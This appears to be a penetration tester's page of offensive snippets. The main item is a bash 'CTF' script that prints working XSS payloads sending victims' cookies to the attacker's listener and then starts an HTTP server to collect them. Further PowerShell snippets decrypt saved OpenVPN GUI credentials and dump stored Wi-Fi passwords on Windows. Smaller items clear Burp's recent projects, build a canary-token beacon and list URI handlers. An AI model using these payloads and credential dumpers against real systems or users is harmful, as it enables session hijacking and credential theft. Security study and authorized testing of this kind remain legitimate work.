Snippets

background image

Just some snippets. Check out GitHub for everything.

cookie_theft.sh

For exploiting XSS to steal cookies. By default, it will start a Python http server on eth0 and port 80. It will also spit out some basic XSS payloads.
If you want to change the interface or port, run as: cookie_theft.sh <interface> <port>

  
#!/bin/bash

# CTF script to generate XSS payloads for stealing cookies
RED="\e[31m"
GREEN="\e[32m"
ENDCOLOR="\e[0m"
BOLD="\e[1m"
UNDERLINE="\e[4m"
echo -e "\n\n🍪${GREEN}Rapid Cookie Theft${ENDCOLOR} 🍪"

# Check the number of arguments
if (( $# == 0 )); then
  # Default values
  interface="eth0"
  port=80
elif (( $# == 2 )); then
  # Assign arguments
  interface=$1
  port=$2
else
  # Invalid number of arguments
  echo -e "${RED}[-]${ENDCOLOR} Unexpected arguments"
  echo -e "${RED}[-]${ENDCOLOR} Usage: cookie_theft.sh <interface> <port>"
  echo -e "${RED}[-]${ENDCOLOR} If no arguments are passed, defaults to eth0 and port 80"
  echo -e "${RED}[-]${ENDCOLOR} Exiting...\n"
  exit 1
fi

if ! command -v python3 2>&1 >/dev/null
then
  echo -e "${RED}[-]${ENDCOLOR} python3 not found on system"
  echo -e "${RED}[-]${ENDCOLOR} Exiting...\n"
  exit 1
fi
ip=$(/sbin/ip -o -4 addr list $interface | awk '{print $4}' | cut -d/ -f1)

if [[ $ip == "" ]];
then
  echo -e "${RED}[-]${ENDCOLOR} Usage: cookie_theft.sh <interface> <port>"
  echo -e "${RED}[-]${ENDCOLOR} If no arguments are passed, defaults to eth0 and port 80"
  echo -e "${RED}[-]${ENDCOLOR} Exiting...\n"
  exit 1
fi
echo -e "${GREEN}[+] ${ENDCOLOR}Listening interface: ${UNDERLINE}$interface${ENDCOLOR} with IP: ${UNDERLINE}$ip${ENDCOLOR}"
echo -e "${GREEN}[+] ${ENDCOLOR}Listening Port: ${UNDERLINE}$port${ENDCOLOR}"

#print payloads
echo -e "\n${GREEN}Example XSS Payloads:${ENDCOLOR}"
echo -e "---------------------------------------------------------------------------------------\n"
echo "<script>"
echo "fetch('$ip:$port', {"
echo "method: 'POST',"
echo "mode: 'no-cors',"
echo "body:document.cookie"
echo "});"
echo "</script>"
echo -e "\n---------------------------------------------------------------------------------------\n"
echo "<script>var i=new Image;i.src='$ip:$port/?'+document.cookie;</script>"
echo -e "\n---------------------------------------------------------------------------------------\n"
echo "<img src=x onerror=this.src='http://$ip:$port/?'+document.cookie;>"
echo -e "\n---------------------------------------------------------------------------------------\n"
echo -e "\"><script>document.location='http://$ip:$port/?'+document.cookie</script>"
echo -e "\n---------------------------------------------------------------------------------------\n"
echo -e "\n${GREEN}[+] ${ENDCOLOR}Starting HTTP server ${ENDCOLOR}"

#Start HTTP Server
python3 -m http.server $port

Clear BurpSuites Recent Projects

Burp’s recent projects are stored within HKCU:\Software\JavaSoft\Prefs\burp\ on Windows hosts. The snippet below will clear the values. Useful for demoing Burp if you don’t want to see previous project names.

  
foreach($i in 0..24){Set-ItemProperty -Path 'HKCU:\Software\JavaSoft\Prefs\burp\' -name suite.recent/Project/Files$i -Value ""}

Steal OpenVPN GUI Credentials

Dumps all saved OpenVPN GUI credentials from a Windows Host.

  
#OpenVPN GUI is not the same as OpenVPN connect
Add-Type -AssemblyName System.Security
$keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs"
$items = $keys | ForEach-Object {Get-ItemProperty $_.PsPath}

foreach ($item in $items)
{
  $encryptedbytes=$item.'auth-data'
  $entropy=$item.'entropy'
  $keyname = $item.PSPath -split "\\"
    #check if there is auth data for profile
    if ($entropy){
      $entropy=$entropy[0..(($entropy.Length)-2)]
      $decryptedbytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
        $encryptedBytes,
        $entropy,
        [System.Security.Cryptography.DataProtectionScope]::CurrentUser)

      $username=$encryptedbytes=$item.'username'

      Write-Host ("Profile: " + $keyname[-1])
      $proflen = $keyname[-1] | Measure-Object -Character
      Write-Host ("-" * $proflen.Characters + "---------")
      Write-Host ("UserName: " + [System.Text.Encoding]::Unicode.GetString($username))
      Write-Host ("Password: " + [System.Text.Encoding]::Unicode.GetString($decryptedbytes) + "`n")
      }

    else {
    Write-Host ("No Auth Data for: " + $keyname[-1] + "`n")
    }
}

Steal Wireless Credentials

Dumps all saved SSID’s and their corresponding passwords from a Windows host.

  
(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize

Canary Token Cradle

  
//This C# method will trigger a canary alert when the compiled code is executed
//The alert will contain the machine name and domain name in the UserAgent field
//ex: mycomputer@companydomain.local

// Generate a web alert token at https://canarytokens.org/nest/

 static void canary()
        {
            //Build the webrequest
            //Set token var to your token url
            var token = "<canary token>";
            System.Net.HttpWebRequest request = (HttpWebRequest)WebRequest.Create(token);

            //Building the useragent with the domain and hostname
            var mn = Environment.MachineName;
            var dn = Environment.UserDomainName;
            request.UserAgent = (ma + "@" + dn);

            HttpWebResponse response = (HttpWebResponse)request.GetResponse();
            Stream resStream = response.GetResponseStream();
        }

Grab URI Handlers

Dumps all URI handlers from a Windows host.

  
gci -ea SilentlyContinue -recurse HKLM:\ | get-itemproperty | where { $_  -match 'URL:' }